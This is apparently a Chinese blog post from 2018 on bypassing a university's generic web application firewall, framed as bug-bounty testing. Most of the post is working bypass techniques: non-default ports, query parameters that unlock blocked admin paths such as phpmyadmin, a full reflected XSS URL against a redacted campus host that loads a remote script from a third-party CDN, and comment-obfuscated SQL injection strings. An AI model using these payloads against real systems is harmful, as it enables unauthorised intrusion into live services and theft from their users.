博文

目前显示的是 十二月, 2018的博文

██大学通用型WAF不完全绕过(持续非定期更新)

图片
Update 该██大学WAF并非██大学自研,据推测只是某商用WAF 引子 每一个想日,啊呸,测试 █ 大各个系统安全性的人都会遇到一只通用型WAF,这个冷酷的WAF一言不合就喜欢把包给reset掉。 这给各位想要刷SRC的小白帽造成了一定的困扰,本文来讲讲个人绕过这只WAF的经验。 同时如果学校负责搞这一块的人看到了,麻烦reinforce一下这个WAF,不要沉迷于炫酷的NDR和花哨的基于机器学习的防护了(求不开除)。 非默认端口导致完全绕过 测试HTTPS服务 测试8080/8081等端口的服务 从非主流端口刷洞往往会有惊喜哦~ 路径限制绕过 这只WAF会对访问敏感路径加以限制,但是加上参数可以绕过。 比如想访问 xxx.██.edu.cn/phpmyadmin/会被拦截,访问 xxx.██.edu.cn/phpmyadmin/?id=1可以绕过 XSS防护绕过 最直白的payload类似<script> alert('xss'); </script> 但是你可以用<script src=来远程加载脚本,并绕过防护 来一个我们网安院的XSS http://██.██.edu.cn/██/██?search=naive%22%3E%20%3Cmeta%20name=%22referrer%22%20content=%22never%22%20%3E%20%3Cscript%20src=%22https://cdn.jsdelivr.net/gh/TomAPU/xsstest/test.js%22%3E%3C/script%3E%20%3C!-- SQL注入绕过 Union注入时union select 1 from 2替换成union/*fuckyou//*a*//*!select*/1/*fuckyou//*a*//*!from*/2 order by测试时直接把空格换成/**//**/